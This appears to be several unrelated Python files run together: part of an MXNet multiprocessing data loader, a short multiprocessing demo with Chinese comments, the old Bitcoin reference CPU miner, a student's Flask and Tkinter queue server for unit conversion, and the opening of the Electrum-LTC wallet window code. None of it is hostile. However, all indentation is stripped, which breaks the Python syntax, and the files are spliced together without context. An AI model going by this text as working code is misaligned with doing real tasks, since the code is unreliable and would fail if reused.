# shuffle if do training
shuffle_indices = None
if self._shuffle:
shuffle_indices = keep_indices if keep_indices is not None else all_indices
np.random.shuffle(shuffle_indices)
if shuffle_indices is not None or keep_indices is not None:
indices = shuffle_indices if shuffle_indices is not None else keep_indices
for v_group in X_fetch:
X_fetch[v_group] = X_fetch[v_group][indices]
y_fetch = y_fetch[indices]
if Z_fetch is not None:
Z_fetch = Z_fetch[indices]
if ext_fetch is not None:
ext_fetch = ext_fetch[indices]
# --------- put batches into the queue ----------
for b in range(0, len(y_fetch), self._batch_size):
# delay = np.random.uniform() / 100
# time.sleep(delay)
e = b + self._batch_size
X_batch = {v_group:X_fetch[v_group][b:e] for v_group in X_fetch}
y_batch = y_fetch[b:e]
Z_batch = None if Z_fetch is None else Z_fetch[b:e]
ext_batch = None if ext_fetch is None else ext_fetch[b:e]
if len(y_batch) == self._batch_size:
self.queue.put((X_batch, y_batch, ext_batch, Z_batch))
except Exception:
# set stop flag if any exception occurs
self._stop_event.set()
raise
with self._lock:
# decrease counter value by 1
self._counter.value -= 1
def start(self):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
logging.debug('Starting queue, file[0]=' + self._filelist[0])
try:
self._counter = multiprocessing.Value('i', 0)
self._threads = []
self._stop_event = multiprocessing.Event()
self.queue = multiprocessing.Queue(maxsize=self._q_size)
self._idx = 0
self._file_indices = np.arange(len(self._filelist))
np.random.shuffle(self._file_indices)
self.add()
except:
self.stop()
raise
def add(self):
'''Try adding a process if the pool is not full.'''
def run(ifile):
self.data_generator_task(ifile)
if len(self._threads) >= len(self._filelist):
# all files are processed
return
try:
if self._counter.value < self._workers:
# Reset random seed else all children processes
# share the same seed
np.random.seed()
thread = multiprocessing.Process(target=run, args=(self._file_indices[self._idx],))
thread.daemon = True
self._threads.append(thread)
thread.start()
self._idx += 1
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set() and sum([t.is_alive() for t in self._threads])
def stop(self):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
logging.debug('Stopping queue, file[0]=' + self._filelist[0])
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.terminate()
if self.queue is not None:
self.queue.close()
self._counter = None
self._threads = []
self._stop_event = None
self.queue = None
self._file_indices = None
self._idx = None
class DataLoader(mx.io.DataIter):
def __init__(self, filelist, data_format, batch_size, shuffle=True, predict_mode=False, fetch_size=600000, up_sample=True, one_hot_label=False, args=None):
self._data_format = data_format
self._batch_size = batch_size
self._workers = args.dataloader_nworkers
self._q_size = args.dataloader_qsize
self._weight_scale = args.dataloader_weight_scale
self._max_resample = args.dataloader_max_resample
self._predict_mode = predict_mode
self._one_hot_label = one_hot_label
self.args = args
self._provide_data = []
for v_group in self._data_format.train_groups:
shape = (batch_size,) + self._data_format.train_groups_shapes[v_group]
self._provide_data.append((v_group, shape))
self._provide_label = [('softmax_label', (batch_size,))]
for v in self._data_format.extra_label_vars:
self._provide_label.append(('label_' + v, (batch_size,)))
h5_samples = sum([DataFormat.nevts(filename, self._data_format.label_var) for filename in filelist])
self.steps_per_epoch = h5_samples // batch_size
if not self.args.syn_data:
self.enqueuer = PyTableEnqueuer(filelist, data_format, batch_size, self._workers, self._q_size, shuffle, predict_mode, fetch_size, up_sample, weight_scale=self._weight_scale, max_resample=self._max_resample)
self._wait_time = 0.01 # in seconds
self.reset()
@property
def provide_data(self):
return self._provide_data
@property
def provide_label(self):
return self._provide_label
def get_truths(self):
return np.concatenate(self._truths)
def get_observers(self):
return np.concatenate(self._observers)
def __iter__(self):
return self
def reset(self):
self._ibatch = 0
self._data = None
self._label = None
# stores truths and observers
if self._predict_mode:
self._truths = []
self._observers = []
if not self.args.syn_data:
self.enqueuer.stop()
self.enqueuer.start()
def __next__(self):
return self.next()
def next(self):
self._ibatch += 1
if self.args.syn_data:
if self._ibatch > self.steps_per_epoch:
raise StopIteration
self._data = [mx.nd.array(np.random.uniform(size=shape)) for v_group, shape in self._provide_data]
self._label = [mx.nd.array(np.random.randint(self._data_format.num_classes, size=self.batch_size))]
for v in self._data_format.extra_label_vars:
self._label.append(mx.nd.random_uniform(shape=self._batch_size))
return mx.io.DataBatch(self._data, self._label, provide_data=self.provide_data, provide_label=self.provide_label, pad=0)
generator_output = None
while True:
self.enqueuer.add()
if not self.enqueuer.queue.empty():
generator_output = self.enqueuer.queue.get()
break
else:
if not self.enqueuer.is_running():
break
time.sleep(self._wait_time)
if generator_output is None:
self.enqueuer.stop()
raise StopIteration
X_batch, y_batch, ext_batch, Z_batch = generator_output
self._data = [mx.nd.array(X_batch[v_group]) for v_group in self._data_format.train_groups]
if self._one_hot_label:
self._label = [mx.nd.array(y_batch)]
else:
self._label = [mx.nd.array(np.argmax(y_batch, axis=1))] # cannot use one-hot labelling?
for i, v in enumerate(self._data_format.extra_label_vars):
self._label.append(mx.nd.array(ext_batch[:, i]))
if Z_batch is not None:
self._truths.append(y_batch)
self._observers.append(Z_batch)
if self._ibatch % (self.steps_per_epoch // 50) == 0:
logging.info('Batch %d/%d' % (self._ibatch, self.steps_per_epoch))
# logging.info('Batch %d/%d' % (self._ibatch, self.steps_per_epoch))
# if self._ibatch % 100 == 0 or self._ibatch > self.steps_per_epoch - 100:
# print(self._ibatch, ': ', np.unique(self._label[0].asnumpy(), return_counts=True))
return mx.io.DataBatch(self._data, self._label, provide_data=self.provide_data, provide_label=self.provide_label, pad=0)
|
test.py
|
"""
自定义进程类
"""
from multiprocessing import Process
# 使用面向对象的思想,创建自己的类
class MyProcess(Process):
def __init__(self, value, group=None, target=None, name=None, args=(), kwargs={}):
self.value = value
super().__init__(group, target, name, args, kwargs)
# 进行执行内容的入口函数
def run(self):
print("重写的run运行了")
def function():
print("子进程运行了")
my_process = MyProcess(value=3, target=function) # 这个target并不会运行,因为start会调用run函数,run函数本身会调用target
# 启动进程 进程执行内容从入口函数run引出
my_process.start()
my_process.join()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6688
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
# Krishna Chaitanya Naragam
# 1001836274
from tkinter import *
from datetime import datetime
import threading
from flask import Flask
import os, signal
from flask import request
import time
# declarations
root = None
information_panel = None
# serve Queue A
def serve_A(i):
i = float(i)
output = "\n=========================\n"
output += "Meter: {}\n".format(i)
output += "Millimeter: {}\n".format(i*1000)
output += "Centimeter: {}\n".format(i*100)
output += "Kilometer: {}\n".format(i*0.001)
output += "Astronomical Unit: {}\n".format(i*(6.68459e-12))
output += "=========================\n"
return output
# serve Queue B
def serve_B(i):
i = float(i)
output = "\n=========================\n"
output += "Meter: {}\n".format(i)
output += "Parsec: {}\n".format(i*(3.24078e-17))
output += "Light Year: {}\n".format(i*(1.057e-16))
output += "Inch: {}\n".format(i*39.3701)
output += "Foot: {}\n".format(i*3.28084)
output += "Yard: {}\n".format(i*(1.0936133333333))
output += "=========================\n"
return output
# serve Queue A
def serve_C(i):
i = float(i)
output = "=========================\n"
output += "Meter: {}\n".format(i)
output += "Mile: {}\n".format(i*0.000621371)
output += "Nautical Mile: {}\n".format(i*0.000539957)
output += "American football field: {}\n".format(i/109.7)
output += "Hand: {}\n".format(i*9.84252)
output += "Horse: {}\n".format(i/2.4)
output += "=========================\n"
return output
# Quit functionality for GUI
def quit():
global app
global root
app.do_teardown_appcontext()
root.destroy()
os.kill(os.getpid(), signal.SIGINT)
# append information to panel on the UI
def append_info_panel(info):
global information_panel
information_panel['state'] = NORMAL
information_panel.insert(END, str(datetime.now())+ ": " + str(info)+"\n")
information_panel.see(END)
information_panel['state'] = DISABLED
# run GUI
def run_GUI():
# GUI loop
global information_panel
global root
root = Tk()
root.title('Server')
server_status = Label(root, text="Server: Online")
server_status.pack()
information_panel = Text()
information_panel.pack()
information_panel['state'] = DISABLED
quit_button = Button(root, command=quit, text="Quit")
quit_button.pack()
root.mainloop()
app = Flask(__name__)
# home page
@app.route('/')
def home():
return 'Server up!'
# get entire queue and delete the file
@app.route('/getQueue/<user>/<q>')
def getQueue(user,q):
append_info_panel("User connected {}".format(user))
if q in ['A', 'B', 'C']:
out = ''
try:
f= open('{}.queue'.format(q))
out = f.read()
f.close()
os.remove('{}.queue'.format(q))
except Exception as e:
out = "Queue {} is empty!".format(q)
append_info_panel("Getting Queue {}\n{}".format(q, out))
return out
append_info_panel("User {} Disconnected!".format(user))
return "Queue Not Found"
# put item into the queue
@app.route('/putInQueue/<user>/<q>/<metric>')
def putInQueue(user,q,metric):
append_info_panel("User connected {}".format(user))
append_info_panel("user {} inserterd to queue: {}, metric: {}".format(user, q, metric))
f = open('{}.queue'.format(q),'a+')
if q == 'A':
metric = serve_A(metric)
if q == 'B':
metric = serve_B(metric)
if q == 'C':
metric = serve_C(metric)
f.write(metric)
f.close()
append_info_panel("Converted values are,\n{}".format(metric))
append_info_panel("User {} Disconnected!".format(user))
return "inserted to queue: {}".format(q)
if __name__ == '__main__':
port = 5000
t = threading.Thread(target=run_GUI)
t.daemon = True
t.start()
time.sleep(2)
append_info_panel("Server running on port {}".format(port))
app.run(port=port)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget)
import electrum_ltc as electrum
from electrum_ltc import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum_ltc.bitcoin import COIN, is_address
from electrum_ltc.plugin import run_hook, BasePlugin
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException)
from electrum_ltc.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum_ltc.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum_ltc.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum_ltc.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
